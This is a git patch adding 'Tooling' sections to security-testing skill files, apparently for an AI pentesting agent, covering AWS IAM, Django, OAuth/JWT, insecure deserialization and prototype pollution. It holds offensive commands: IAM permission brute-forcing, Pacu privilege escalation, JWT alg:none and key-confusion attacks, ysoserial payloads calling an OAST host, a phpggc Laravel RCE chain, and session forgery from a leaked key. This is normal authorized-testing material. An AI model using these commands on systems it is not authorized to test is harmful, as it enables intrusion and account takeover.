From 96cd61e4588a6996216106db5eb5070a72c48779 Mon Sep 17 00:00:00 2001 From: bearsyankees Date: Fri, 3 Jul 2026 00:07:59 -0400 Subject: [PATCH] some tools ads --- strix/skills/cloud/aws.md | 20 +++++++++++++++++ strix/skills/frameworks/django.md | 13 ++++++++++- strix/skills/protocols/oauth.md | 14 ++++++++++++ .../insecure_deserialization.md | 22 ++++++++++++++++++- .../vulnerabilities/prototype_pollution.md | 12 +++++++++- 5 files changed, 78 insertions(+), 3 deletions(-) diff --git a/strix/skills/cloud/aws.md b/strix/skills/cloud/aws.md index df7a345..299e5f6 100644 --- a/strix/skills/cloud/aws.md +++ b/strix/skills/cloud/aws.md @@ -206,6 +206,26 @@ curl http://169.254.169.254/latest/user-data 4. Review trust policies on roles, not just permission policies 5. Combine with subdomain takeover — dangling S3 bucket names in DNS CNAMEs +## Tooling + +Prefer credential-light, install-once CLIs. The sandbox has `awscli`/`python`/`pipx`/`go` and build-time egress. + +- **awscli** — the primary enumeration tool (used throughout this skill). Always start with `aws sts get-caller-identity`. +- **enumerate-iam** (andresriancho) — tiny script that brute-forces which API calls a set of keys can make when you can't read your own policy: + ``` + git clone https://github.com/andresriancho/enumerate-iam && cd enumerate-iam + pip install -r requirements.txt + python enumerate-iam.py --access-key AKIA... --secret-key ... + ``` +- **cloudsplaining** (Salesforce) — offline IAM policy risk analysis; finds privilege-escalation/resource-exposure in the auth-details JSON: + ``` + pipx install cloudsplaining + aws iam get-account-authorization-details > auth.json + cloudsplaining scan --input-file auth.json + ``` +- **CloudFox** (BishopFox) — single Go binary for fast post-compromise inventory and "what can I do from here" surfacing: `cloudfox aws --profile all-checks` +- **Pacu** (Rhino Security Labs) — the standard AWS exploitation framework; heavier, but its `iam__privesc_scan` module automates the escalation table above. Use for a full exploitation session (`run iam__enum_permissions`, then `run iam__privesc_scan`). + ## Summary AWS security requires least-privilege IAM, blocked public data paths, IMDSv2 with hop limits, and tight resource policies. Enumerate from any credential found — even limited read access often reveals escalation chains. diff --git a/strix/skills/frameworks/django.md b/strix/skills/frameworks/django.md index 665ad1e..17f45b5 100644 --- a/strix/skills/frameworks/django.md +++ b/strix/skills/frameworks/django.md @@ -71,7 +71,7 @@ Map endpoints, authentication classes, and permission classes per route. - Weak or leaked `SECRET_KEY` → forge session cookies (`django.contrib.sessions.backends.signed_cookies`) **JWT (simplejwt)** -- Accepting `HS256` with public key confusion if misconfigured +- RS256→HS256 confusion if algorithm pinning is misconfigured - Missing `user_id`/`token` blacklist on logout - Refresh token rotation not enforced @@ -198,6 +198,17 @@ Jinja2 backend without autoescape: `{{7*7}}`, RCE gadgets if sandbox misconfigur 4. `django.contrib.admin` uses separate auth — don't assume API auth covers admin 5. Compare ASGI WebSocket consumers against REST permissions for the same resource +## Tooling + +Static analysis is the fastest way to reach the sinks above in white-box scope. The sandbox ships `python`/`pipx`, `semgrep`, `bandit`, `ast-grep`, and `ripgrep`. + +- **bandit** (preinstalled) — Python security linter; flags `mark_safe`, `extra()`, `RawSQL`, `subprocess`, weak crypto, hardcoded secrets: `bandit -r . -ll` +- **semgrep** (preinstalled) with the Django ruleset — higher-signal than bandit for framework-specific bugs (`.extra()`, `RawSQL`, `|safe`, `csrf_exempt`, `ALLOWED_HOSTS=['*']`): `semgrep --config p/django .` +- **pip-audit** (PyPA) — dependency CVE scanner for known-vuln Django/DRF/simplejwt versions: `pipx install pip-audit && pip-audit -r requirements.txt` +- **ast-grep** (preinstalled) — quick structural grep for risky calls without a full SAST run: `ast-grep run -p 'mark_safe($X)' -l python` + +For the `SECRET_KEY` → signed-cookie/reset-token forgery path noted under Session Issues, Django's own `django.core.signing` is the "tool": with a leaked key you can mint valid `signing.dumps()` values (session cookies, password-reset tokens, and `PickleSerializer`-backed session RCE). + ## Summary Django's defaults help (CSRF middleware, template auto-escape) but DRF, raw SQL, custom permissions, and deployment settings introduce frequent gaps. Test every endpoint with role-separated principals and verify object-level enforcement on querysets, not just authentication presence. diff --git a/strix/skills/protocols/oauth.md b/strix/skills/protocols/oauth.md index 5021f7b..819870b 100644 --- a/strix/skills/protocols/oauth.md +++ b/strix/skills/protocols/oauth.md @@ -166,6 +166,20 @@ com.app://callback (mobile custom scheme) 4. Check logout/revocation — tokens may remain valid after "logout" 5. Chain with open redirect or XSS on the legitimate redirect_uri to exfiltrate codes +## Tooling + +The sandbox ships **jwt_tool** (already cloned at `/home/pentester/tools/jwt_tool`) plus `curl` — enough for the token side of OAuth/OIDC. + +- **jwt_tool** (ticarpi) — inspect and tamper ID tokens / JWT access tokens: `alg:none`, `HS256`/`RS256` key confusion, `kid` injection, claim editing (`sub`, `aud`, `iss`, `exp`): + ``` + python3 /home/pentester/tools/jwt_tool/jwt_tool.py # decode/inspect + python3 /home/pentester/tools/jwt_tool/jwt_tool.py -X a # alg:none + python3 /home/pentester/tools/jwt_tool/jwt_tool.py -X k -pk pub.pem # RS256->HS256 confusion + ``` +- **curl** — drive the authorize → callback → token chain by hand so you control every parameter (`redirect_uri`, `client_id`, `state`, PKCE `code_challenge`/`code_verifier`) and can test the binding/downgrade cases above. + +Humans often use Burp's **EsPReSSO** (RUB-NDS) SSO extension for flow visualization; it is GUI-only, so prefer manual `curl` + `jwt_tool` in-sandbox. + ## Summary OAuth security hinges on strict redirect URI binding, unguessable state/nonce, PKCE for public clients, and consistent token audience validation. Any gap in the authorize-to-token chain is a potential account takeover. diff --git a/strix/skills/vulnerabilities/insecure_deserialization.md b/strix/skills/vulnerabilities/insecure_deserialization.md index db38212..6b5ebe5 100644 --- a/strix/skills/vulnerabilities/insecure_deserialization.md +++ b/strix/skills/vulnerabilities/insecure_deserialization.md @@ -1,5 +1,5 @@ --- -name: insecure_deserialization +name: insecure-deserialization description: Insecure deserialization testing for Java, Python, PHP, .NET, Ruby, and Node.js covering gadget chains, type confusion, and safe validation --- @@ -163,6 +163,26 @@ When `TypeNameHandling` != `None`. 4. In white-box, trace from `readObject`/`unserialize`/`pickle.loads` backward to source 5. ViewState MAC off is still common on legacy ASP.NET — test early on `.aspx` apps +## Tooling + +Payload generation is the practitioner's core tool here. The sandbox has `git`/`python`/`go` and **interactsh-client** (OAST); add a JRE or `php-cli` if you need the Java/PHP generators. + +| Tool | Language / format | Use | +|------|-------------------|-----| +| **ysoserial** (frohoff) | Java native | Gadget-chain payloads: `CommonsCollections1-7`, `Groovy1`, `Spring1/2`, and `URLDNS` for a safe no-exec DNS oracle. Needs a JRE. | +| **phpggc** (ambionics) | PHP `unserialize` / Phar | Framework POP chains (Laravel, Symfony, WordPress, Drupal, Monolog). Needs `php-cli`. | +| **ysoserial.net** | .NET `BinaryFormatter` / Json.NET | Windows/.NET gadget payloads. Needs .NET/mono — usually out of scope in a Linux sandbox. | + +``` +# Java: prove the sink with a no-exec DNS oracle BEFORE any RCE chain +java -jar ysoserial.jar URLDNS "http://$(interactsh-client -json | jq -r .host)" | base64 -w0 + +# PHP: generate a Laravel POP chain (base64), fast path via a framework gadget +./phpggc -b Laravel/RCE9 system id +``` + +Confirm the sink with a callback (`URLDNS` / interactsh OAST) before firing a command-exec chain, and match the chain to the fingerprinted library version — the wrong chain just adds noise. + ## Summary Treat every deserialization of untrusted data as critical. Safe patterns use JSON schema validation without type polymorphism, `yaml.safe_load`, signed encrypted tokens, or no custom serialization at all. Prove impact with callback or bounded execution — not just error stack traces. diff --git a/strix/skills/vulnerabilities/prototype_pollution.md b/strix/skills/vulnerabilities/prototype_pollution.md index 5eed6e5..2c6ce49 100644 --- a/strix/skills/vulnerabilities/prototype_pollution.md +++ b/strix/skills/vulnerabilities/prototype_pollution.md @@ -1,5 +1,5 @@ --- -name: prototype_pollution +name: prototype-pollution description: Client and server prototype pollution testing covering JavaScript object merge bugs, Node.js RCE chains, and filter bypasses --- @@ -127,6 +127,16 @@ Gadget availability depends on package versions — enumerate `node_modules` in 4. Node gadget chains are version-specific — confirm package version before claiming RCE 5. Combine with client-side template injection if polluted keys flow into rendering config +## Tooling + +Detection is mostly about payload shapes (above) plus a couple of light helpers. The sandbox has `go` and `nuclei`; `ppfuzz` is a single static binary. + +- **ppfuzz** (dwisiswant0) — fast client-side prototype-pollution fuzzer (Rust, single binary); good for spraying the URL/param shapes across many endpoints: `ppfuzz -l urls.txt` +- **nuclei** (preinstalled) — has prototype-pollution templates for quick triage: `nuclei -u https://target -tags prototype-pollution` +- **BlackFan `client-side-prototype-pollution`** — not a tool but the canonical **gadget reference**: maps polluted keys to concrete DOM-XSS sinks per library (jQuery, Popper, Wistia, etc.). Use it to turn a confirmed pollution into real impact. + +For server-side gadget hunting there is no reliable one-click tool — enumerate `node_modules` in white-box scope and match polluted keys to sinks (`ejs`/`pug` `outputFunctionName`, `child_process` `shell`/`NODE_OPTIONS`) as covered above. + ## Summary Any unsafe recursive merge of user-controlled keys is a prototype pollution candidate. Block `__proto__`, `constructor`, and `prototype` keys, use null-prototype objects, and validate impact with behavioral proof — not just reflected keys.